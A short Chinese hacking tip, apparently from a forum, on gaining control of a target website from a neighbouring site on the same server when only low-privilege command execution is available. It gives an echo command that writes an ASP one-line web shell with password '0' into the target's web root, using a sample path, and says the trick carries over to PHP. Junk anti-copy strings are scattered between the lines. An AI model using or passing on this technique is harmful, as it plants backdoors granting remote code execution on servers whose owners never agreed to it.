在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
# ^+ {( D7 g' J* j0 S" B
, M8 p3 W2 X$ ?& C命令格式$ _3 f p( m. ~4 E
4 z5 W6 q7 C" q$ d
Echo 语句 >目标站绝对目录 a H P- t3 Q7 V% v- B
, F) s7 J6 g; v7 |: l% U例如: . \( k# d$ t. {, p2 ~2 B2 p
. e4 A1 @' e) \3 l; F- \8 cecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
( k6 S% L. l% I( ~. S' e. g+ ^4 W' D1 I
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
, l2 `2 ]) Q2 A5 s" F |